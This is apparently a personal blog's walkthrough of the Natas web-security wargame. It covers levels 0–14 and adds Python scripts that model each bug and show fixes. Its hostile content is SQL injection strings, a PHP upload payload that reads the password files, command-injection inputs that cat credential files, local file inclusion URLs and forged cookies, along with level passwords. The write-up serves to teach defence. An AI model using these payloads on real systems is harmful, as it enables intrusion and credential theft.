Hello All,
It has been a long time since I posted anything on this blog. I have been involved in some network-related penetration testing recently, and I found the Python Scapy module very handy, so I decided to write a small post about it. Once you get familiar with the tool, it makes life easier for network admins and pen testers. It works well on Linux once the Scapy packages are installed; I have not tried it on Windows, because it needs some extra dependencies there. Scapy is mainly used to create, manipulate, send and capture TCP/IP packets, and a lot more. Always run Scapy with root privileges (it needs raw-socket access to craft and sniff packets). In upcoming posts I plan to cover how to create packets, send them, replay captured packets, and some attacks (ARP flooding, TCP initial sequence number prediction, etc.) that can be performed with Scapy. To read more about Scapy and its uses, visit this link.
Natas 14
Let us look at the source code to find out what kind of vulnerability this is. Source code: <?
Yes, your guess is right! It is a SQL injection vulnerability.
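The login at this level builds its SQL by pasting the submitted username and password into a query that wraps both values in double quotes. The Python script below is an added example (not the level's code, and not from the original post): it reproduces that pattern against a constructed in-memory SQLite table to show why a payload only escapes the string when it uses the same quote character as the query, and what the parameterised fix looks like. The sample accounts are assumptions, and because SQLite comments start with -- rather than MySQL's #, the payloads use -- instead.

```python
import sqlite3

# Constructed sample accounts; not the natas14 database.
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def open_db():
    """In-memory SQLite copy of a two-column users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return con


def vulnerable_login(con, username, password, quote='"'):
    """Builds the query by string concatenation. `quote` is the character the
    query wraps its values in: natas14 uses double quotes. A payload only
    breaks out of the string if it uses that same character."""
    query = (
        "SELECT * FROM users WHERE username=%s%s%s AND password=%s%s%s"
        % (quote, username, quote, quote, password, quote)
    )
    try:
        rows = con.execute(query).fetchall()
    except sqlite3.Error:
        return False  # a syntax error from a mangled query is just "Access denied"
    return len(rows) > 0


def safe_login(con, username, password):
    """Parameterised query: the values travel separately from the SQL text, so
    quote characters in the input can never change the statement's structure."""
    rows = con.execute(
        "SELECT * FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return len(rows) > 0


if __name__ == "__main__":
    con = open_db()
    single = "1' or '1'='1' -- "
    double = '1" or "1"="1" -- '
    print("single-quote payload vs double-quoted query:",
          vulnerable_login(con, single, "x"))   # False: stays inside the string
    print("double-quote payload vs double-quoted query:",
          vulnerable_login(con, double, "x"))   # True: WHERE is now always true
    print("double-quote payload vs parameterised query:",
          safe_login(con, double, "x"))         # False
```

Run it directly to print the three outcomes. SQLite treats a double-quoted token as a string literal when it does not name a column (its default legacy behaviour), which is what makes the double-quoted query run at all; the parameterised version never parses the input as SQL, so the same payload is just an unknown user name.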
First I tried 1' or '1'='1' # in the username field and got an "Access denied" message. Looking at the code again, I saw that the query wraps its values in double quotes rather than single quotes, so the payload has to close a double-quoted string. I then tried 1" or "1"="1" # in the username field and got the password for the next level. :) Successful login! The # turns the rest of the query, including the password check, into a comment.
The password for natas15 is AwWj***cvxr****gZ9J5****kmxdk***
Vulnerability: https://www.owasp.org/index.php/SQL_Injection
Remedy: http://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php

Natas 13
We need to upload an image smaller than 1 KB, and after a successful upload the page gives a link to view it. This time the arbitrary file upload from the previous level has been patched with an extra check. Let us see whether it is fully secured or not :)
Click the "View sourcecode" link on the main page and you will see the following code: <?
The difference from the previous level's code is that it checks the file signature (the "magic bytes") with the exif_imagetype function. After reading about file signatures at the following link, I understood a little about how file types are detected: exif_imagetype only looks at the first few bytes of the file, not the extension and not what follows. So to bypass it I took an image smaller than 1 KB, opened it in Notepad++ and appended my PHP script at the end of the file: <?php
I added the echo line to separate the password from the image data. I uploaded the file and, as in the previous level, changed the extension to .php in the POST data.
Now I had the hyperlink to my PHP script. I visited that page and got the password for the next level:
<Existing file data>==================="Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
Natas14 : Lg**M10****PyVBk****mbllQ5L6****

Natas 12
We need to upload an image smaller than 1 KB, and after a successful upload the page gives a link to view it.
Solution: Click the "View sourcecode" link on the main page and you will see the following code: <?php
The code shows that makeRandomPathFromFilename takes the extension of the submitted file name and saves the file in the /upload/ directory under a random name generated by genRandomString, keeping that extension; it then shows a hyperlink to the file that was just uploaded. The extension is read from the POST data, so it is under the client's control. I wrote a small PHP script to print the password from the file /etc/natas_webpass/natas13: <?php
I uploaded that PHP file, and while uploading I turned on the Tamper Data add-on in Firefox to change the file extension in the POST data to .php, because the POST data sends .jpg as the default extension.
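Both upload levels above share the same mistake: the file name is random but the extension comes from the request, and at natas13 the only extra check is a signature sniff. The Python below is an added example (not the level's code and not the post's): it builds a constructed 1x1 PNG, appends a PHP payload as the writeup describes, shows that a magic-bytes check in the style of exif_imagetype still reports "png", contrasts a client-chosen extension with one derived server-side from the sniffed type, and adds a PNG chunk walk that detects data appended after the IEND chunk. The signature table, the sample image and the upload directory name are assumptions.

```python
import os
import secrets
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Signatures an exif_imagetype()-style check keys on (a constructed subset).
SIGNATURES = {PNG_SIG: "png", b"\xff\xd8\xff": "jpeg", b"GIF87a": "gif", b"GIF89a": "gif"}

# The kind of payload appended in the writeup: the echo line just separates
# the password from the image bytes.
PHP_PAYLOAD = b'<?php echo "=================="; echo file_get_contents("/etc/natas_webpass/natas14"); ?>'


def _chunk(ctype: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def tiny_png() -> bytes:
    """A constructed, valid 1x1 greyscale PNG (well under 1 KB)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # one scanline: filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def sniff_image_type(data: bytes):
    """What exif_imagetype() effectively does: look at the leading bytes only."""
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None


def build_polyglot(image: bytes, payload: bytes) -> bytes:
    """The natas13 trick: real image bytes first, PHP appended after them."""
    return image + b"\n" + payload


def client_controlled_name(upload_dir: str, submitted_ext: str) -> str:
    """natas12/13 naming: random basename, but the extension is whatever the
    POST body said, so .jpg can be rewritten to .php before sending."""
    return os.path.join(upload_dir, secrets.token_hex(5) + "." + submitted_ext)


def server_controlled_name(upload_dir: str, data: bytes) -> str:
    """Hardened naming: extension derived from the sniffed type, never from the
    request. Uploads must still live where PHP is not executed."""
    kind = sniff_image_type(data)
    if kind is None:
        raise ValueError("not an image")
    return os.path.join(upload_dir, secrets.token_hex(5) + "." + kind)


def png_trailing_bytes(data: bytes):
    """Walk the PNG chunk list and return how many bytes follow IEND
    (0 for a clean file); None if the data is not a well-formed PNG."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length  # length field + type + data + CRC
        if end > len(data):
            return None
        if ctype == b"IEND":
            return len(data) - end
        pos = end
    return None


if __name__ == "__main__":
    poly = build_polyglot(tiny_png(), PHP_PAYLOAD)
    print("sniffed type:", sniff_image_type(poly))          # png: the signature check passes
    print("client-chosen name:", client_controlled_name("upload", "php"))
    print("server-chosen name:", server_controlled_name("upload", poly))
    print("bytes after IEND:", png_trailing_bytes(poly))     # the appended script
```

The chunk walk catches the appended script, but the real fix is not a better sniff: store uploads under a server-chosen name and extension, in a directory the web server never hands to the PHP interpreter, and re-encode images rather than storing the uploaded bytes as-is.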
Now you can see the password for the next level.
Natas 13 : jmLTY0qi****aKc9341c****BJv7M***
Vulnerability: unrestricted file upload (the upload keeps a client-chosen extension, so a .php file can be uploaded and then executed by requesting its link). Related reading: http://en.wikipedia.org/wiki/Remote_File_Inclusion
Remedy: http://www.esecurityplanet.com/browser-security/how-to-prevent-remote-file-inclusion-rfi-attacks.html

Natas 11
Solution: Check out the "View sourcecode" link on the main page and you will see the following code: <?
The loadData function loads and verifies the settings (showpassword and bgcolor) from the cookie using the xor_encrypt function, and the saveData function sets the cookie using xor_encrypt. xor_encrypt takes two inputs: the data ($defaultdata, JSON-encoded) and the key ($key).
$defaultdata XOR $key => encrypted data (cookie value)
So: encrypted data XOR $defaultdata => $key
XOR is its own inverse, so knowing the plaintext (the default data, which is in the source) and the ciphertext (the cookie, after base64-decoding it) gives back the key stream. I wrote the following code using this concept and got the key: <?php
Output (key stream): qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq
The output repeats every four characters, so the key is qw8J. Then another script to produce the exact cookie value, with showpassword set to "yes", that reveals the natas12 password: <?php
Cookie value for showpassword="yes": ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
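The known-plaintext step above, worked through in Python as an added example (not the level's PHP and not the post's own script). It assumes the default settings array from the level's source (showpassword "no", bgcolor "#ffffff"), JSON-encoded without spaces as PHP's json_encode does, and that the cookie is the XOR output base64-encoded; the key qw8J used to build the stand-in cookie is the period of the key stream shown above.

```python
import base64
import json

# Defaults from the level's source: the JSON the server XORs, then base64-encodes.
DEFAULT_DATA = {"showpassword": "no", "bgcolor": "#ffffff"}


def _json(settings: dict) -> bytes:
    """PHP json_encode() layout: no spaces after separators."""
    return json.dumps(settings, separators=(",", ":")).encode()


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, as in the level's xor_encrypt(); it is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_cookie(settings: dict, key: bytes) -> str:
    """What saveData() stores: base64(xor_encrypt(json_encode(settings), key))."""
    return base64.b64encode(xor_encrypt(_json(settings), key)).decode()


def recover_keystream(known_plain: bytes, cookie_b64: str) -> bytes:
    """Known-plaintext attack: plaintext XOR ciphertext gives the key stream."""
    cipher = base64.b64decode(cookie_b64)
    return bytes(p ^ c for p, c in zip(known_plain, cipher))


def shortest_period(stream: bytes) -> bytes:
    """Collapse a repeating key stream (qw8Jqw8J...) to its shortest period (qw8J)."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def forge_cookie(observed_cookie: str) -> str:
    """Full attack: recover the key from the default cookie, then re-encrypt the
    same settings with showpassword flipped to yes."""
    key = shortest_period(recover_keystream(_json(DEFAULT_DATA), observed_cookie))
    return encode_cookie({**DEFAULT_DATA, "showpassword": "yes"}, key)


if __name__ == "__main__":
    # Constructed stand-in for the data cookie a fresh visit sets; on the live
    # level you would copy the real one from the browser instead.
    observed = encode_cookie(DEFAULT_DATA, b"qw8J")
    stream = recover_keystream(_json(DEFAULT_DATA), observed)
    print("key stream:", stream.decode())
    print("key:", shortest_period(stream).decode())
    print("forged cookie:", forge_cookie(observed))
```

On the live level, replace the constructed observed cookie with the data cookie your browser received; the forged value the script prints is the cookie value listed above.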
I changed the cookie value (data) using the Cookies Manager+ add-on in Firefox and retrieved the password for the next level.
The password for natas12 is EDXp****6wLKHZy1****UZk0RKfL****

Natas 9
Solution: Check out the "View sourcecode" link on the main page and you will see the following code: <?
The line passthru("grep -i $key dictionary.txt"); shows that the user's input is placed into a shell command without any sanitization, so this code is vulnerable to command injection. I tried some commands in the input field, for example ; cd /etc/; dir; and I could see all the file names in /etc, so command injection works. As the main page says, "All passwords are also stored in /etc/natas_webpass/", so I ran cat and retrieved the next level's password. Input string to get the key: ; cat /etc/natas_webpass/natas10;
Natas 10 : W0mMh****nG8dc****qvk3JA9lGt****
Vulnerability: Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or "inject") code into a computer program to change the course of execution. The results of a code injection attack can be disastrous.
Remedy: http://stackoverflow.com/questions/1205889/how-to-prevent-code-injection-attacks-in-php

Natas 10
Solution: Check out the "View sourcecode" link on the main page and you will see the following code: <?
This time the code uses preg_match to reject input containing command separators such as ; and |. But the command injection is still there: the input still reaches the shell, only the characters that chain a second command are blocked. So we need a way to read the password file without those symbols.
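To make the natas9 and natas10 behaviour concrete, here is an added Python model (not the level's code and not from the original post) of what passthru does with the key: the command line is word-split by a shell, so ; starts a second command, and even with ; | & blocked, a space still adds arguments to grep. The grep and cat models, the in-memory files and the placeholder password are constructed; the blocklist regex stands in for the level's preg_match check. The safe_search function shows the fix: call grep with an argument list instead of a shell string.

```python
import re
import shlex

# Constructed stand-in for files on the server.
FILES = {
    "dictionary.txt": ["apple", "banana", "cherry"],
    "/etc/natas_webpass/natas10": ["<natas10 password placeholder>"],
}


def fake_grep(argv):
    """Minimal model of `grep [-i] [-e PATTERN] [--] PATTERN FILE...`: the first
    non-option word is the pattern, every later word is a file, and output is
    prefixed with the file name when several files are searched."""
    pattern, files, opts_done = None, [], False
    i = 1
    while i < len(argv):
        arg = argv[i]
        if not opts_done and arg == "--":
            opts_done = True
        elif not opts_done and arg == "-e":
            i += 1
            pattern = argv[i]
        elif not opts_done and arg.startswith("-"):
            pass  # -i and friends: matching below is always case-insensitive
        elif pattern is None:
            pattern = arg
        else:
            files.append(arg)
        i += 1
    if pattern is None:
        return []  # real grep prints a usage error here
    rx = re.compile(pattern, re.IGNORECASE)
    hits = []
    for name in files:
        for line in FILES.get(name, []):  # unknown files: real grep reports an error
            if rx.search(line):
                hits.append(f"{name}:{line}" if len(files) > 1 else line)
    return hits


def fake_cat(argv):
    return [line for name in argv[1:] for line in FILES.get(name, [])]


COMMANDS = {"grep": fake_grep, "cat": fake_cat}


def run_shell(cmdline: str):
    """Simplified /bin/sh: split on ';' into commands, then word-split each one.
    (A real shell also does globbing, pipes and more; enough for the point here.)"""
    out = []
    for cmd in cmdline.split(";"):
        argv = shlex.split(cmd)
        if argv and argv[0] in COMMANDS:
            out += COMMANDS[argv[0]](argv)
    return out


def natas9_search(key: str):
    """passthru("grep -i $key dictionary.txt"): the key is pasted into a shell string."""
    return run_shell(f"grep -i {key} dictionary.txt")


def natas10_search(key: str):
    """Same, but first rejects the command separators (a blocklist like the level's)."""
    if re.search(r"[;|&]", key):
        return ["<rejected: illegal character>"]
    return natas9_search(key)


def safe_search(key: str):
    """Fix: no shell at all. argv is a list, the key is exactly one argument, and
    -e together with -- stops it being read as an option or as a file name."""
    return fake_grep(["grep", "-i", "-e", key, "--", "dictionary.txt"])


if __name__ == "__main__":
    print(natas9_search("; cat /etc/natas_webpass/natas10;"))   # second command runs
    print(natas10_search("; cat /etc/natas_webpass/natas10;"))  # blocked
    print(natas10_search(".* /etc/natas_webpass/natas10"))      # extra file argument leaks
    print(safe_search(".* /etc/natas_webpass/natas10"))         # [] : just an odd pattern
```

One caveat the model skips: a real /bin/sh also glob-expands .* against the working directory (to . and .. at least), so the pattern grep typically receives is a lone ., which still matches every non-empty line; the leak works either way. The argv version makes the whole key a single pattern argument, so a space can no longer introduce a file.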
After a long search on Google I found the idea in the grep command itself: the filter does not block spaces, so the input can add extra arguments to grep. grep takes the first word as the pattern and every following word as a file to search, so with the input .* /etc/natas_webpass/natas10 the command becomes grep -i .* /etc/natas_webpass/natas10 dictionary.txt; the pattern .* matches every line, and the password file is searched alongside the dictionary, so its contents are printed. I gave that input and got the key :)
natas11 : U82q****MQ9xuF****YX61s7OZD9****

Natas 8
Solution: Check out the "View sourcecode" link on the main page and you will see the following code: <?
From this code I wrote the following simple PHP script to get the secret back from the $encodedSecret variable by undoing the encoding steps in reverse order: <?php
I ran this code at http://writecodeonline.com/php4/ and got the secret oubWYf2kBq.
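The encoding the natas8 source applies is bin2hex(strrev(base64_encode($secret))). The Python below is an added example (not the post's PHP script) that implements it and its inverse, undoing the three steps in reverse order and returning each intermediate value, which is the habit worth having when an unknown encoding has to be peeled apart stage by stage. The encoding function is taken from the level's source, which this page does not reproduce; the only input used is the secret the writeup recovered.

```python
import base64
import binascii


def encode_secret(secret: str) -> str:
    """The level's encodeSecret(): bin2hex(strrev(base64_encode($secret)))."""
    b64 = base64.b64encode(secret.encode()).decode()
    return binascii.hexlify(b64[::-1].encode()).decode()


def decode_steps(encoded: str):
    """Undo each step in reverse order and keep every intermediate value:
    hex2bin, then strrev, then base64_decode."""
    reversed_b64 = binascii.unhexlify(encoded).decode()
    b64 = reversed_b64[::-1]
    secret = base64.b64decode(b64).decode()
    return [("hex2bin", reversed_b64), ("strrev", b64), ("base64_decode", secret)]


def decode_secret(encoded: str) -> str:
    """Just the final value; encoding with no key is reversible by anyone."""
    return decode_steps(encoded)[-1][1]


if __name__ == "__main__":
    enc = encode_secret("oubWYf2kBq")   # round trip on the secret the writeup found
    print("encodedSecret:", enc)
    for name, value in decode_steps(enc):
        print(f"{name:14} {value}")
```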
I submitted this secret and got the key for the next level.
The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Natas 6
Solution: First I looked at the source code of the challenge. Seeing include "includes/secret.inc"; in the PHP code, I tried the following link: http://natas6.natas.labs.overthewire.org/includes/secret.inc
The server returns the .inc file as plain text instead of executing it, so the secret text is readable. I typed it into the secret text box and got the credentials for the next level the simple way. :-)
Result: natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Natas 7
Solution: The source page contains the hint <!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->. Browsing the site's pages, I noticed that the page parameter is used to include a file, which is a local file inclusion vulnerability. I requested the following URL and got the natas8 credentials: http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
Result: natas8 password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
Vulnerability: Local File Inclusion. Local File Inclusion (LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized and allows directory traversal characters, or an absolute path as here, to be injected. To prevent these attacks, check the following link: http://hakipedia.com/index.php/Local_File_Inclusion

Natas 3
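The natas7 bug and its fix, as an added Python example (not the level's PHP and not the post's): a constructed web root with two pages, a secret file outside it standing in for /etc/natas_webpass/natas8, an include that trusts the page parameter the way natas7 does, and a hardened version that allow-lists page names and verifies the resolved path stays under the web root. File names and the placeholder secret are assumptions.

```python
import os
import tempfile

# Pages the application legitimately offers (the allow-list).
ALLOWED_PAGES = {"home", "about"}


def make_site():
    """Constructed layout: a web root with two pages, and a secret file that
    lives outside it (standing in for /etc/natas_webpass/natas8)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for name in ALLOWED_PAGES:
        with open(os.path.join(root, name + ".php"), "w") as f:
            f.write(f"<h1>{name}</h1>")
    secret = os.path.join(tempfile.mkdtemp(prefix="natas_webpass_"), "natas8")
    with open(secret, "w") as f:
        f.write("<constructed password placeholder>")
    return root, secret


def vulnerable_include(root: str, page: str) -> str:
    """natas7 pattern: the `page` request parameter goes straight into include().
    An absolute path, or ../ traversal, reads any file the web server can."""
    path = page if os.path.isabs(page) else os.path.join(root, page)
    with open(path) as f:
        return f.read()


def safe_include(root: str, page: str) -> str:
    """Hardened: allow-list the page names, map them to files yourself, and
    still verify the resolved path stays inside the web root (defence in depth
    for the day someone loosens the allow-list)."""
    if page not in ALLOWED_PAGES:
        raise PermissionError(f"unknown page: {page!r}")
    real_root = os.path.realpath(root)
    path = os.path.realpath(os.path.join(real_root, page + ".php"))
    if os.path.commonpath([real_root, path]) != real_root:
        raise PermissionError("path escapes web root")
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    root, secret = make_site()
    print(vulnerable_include(root, "home.php"))
    print(vulnerable_include(root, secret))        # leaks the secret file
    print(safe_include(root, "home"))
    try:
        safe_include(root, secret)
    except PermissionError as e:
        print("blocked:", e)
```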
Solution: The source page has the hint <!-- No more information leaks!! Not even Google will find it this time... -->, which points at robots.txt. In robots.txt in the same directory I found the following lines:
User-agent: *
Disallow: /s3cr3t/
In the /s3cr3t/ directory I found user.txt; opening it gave the next level's username and password.
natas4 : 8ywPLDUB2yY2ujFnwGUdWWp8MT4yZrqz

Natas 4
Solution: The error message on the page says the request has to come from http://natas5.natas.labs.overthewire.org. So I resent the request with the Referer header set to that URL, using the Tamper Data add-on in Firefox to edit the header, and got the credentials for the next level. The Referer header is sent by the client, so it cannot be used as an access control.
The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Natas 5
Solution: The page says you have to log in to access it. Looking at the request details, I noticed a cookie loggedin set to 0. I changed that value to 1 with the Firefox add-on Cookies Manager+, refreshed the page and got the credentials for the next level.
Natas 6 : aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
Vulnerability: Cookie Poisoning. Cookie poisoning attacks involve the modification of the contents of a cookie (personal information stored in a web user's computer) in order to bypass security mechanisms. Using cookie poisoning attacks, attackers can gain unauthorized information about another user and steal their identity. Here the login state lives entirely in a client-side cookie, so the client can set it to anything.
To prevent cookie poisoning, follow this link: http://stackoverflow.com/questions/1633062/how-to-prevent-cookie-poisoning

Natas 0
Solution: Right-click and view the page source.
Natas1 - gtVrDuiDfck831PqWsLEZy5gyDz1clto

Natas 1
Solution: Right-clicking is blocked by a script on the page, so disable JavaScript in your browser and then view the source.
Natas2 - ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

Natas 2
Solution: In the page source you can notice the following line: <img src="files/pixel.png">
I tried http://natas2.natas.labs.overthewire.org/files/ in the browser and found a directory listing vulnerability at that link. The directory contained users.txt, and in it I found the natas3 password.
natas3 - sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
Directory Listing Security Vulnerability:
Description: The web server is configured to display the list of all files contained in this directory. This is not recommended because the directory may contain files that are not normally exposed through links on the web site.
Impact: A user can view a list of all files from this directory, possibly exposing sensitive information.
To avoid the directory listing vulnerability, check this link to understand it in detail.
Vivek N
Archives: June 2017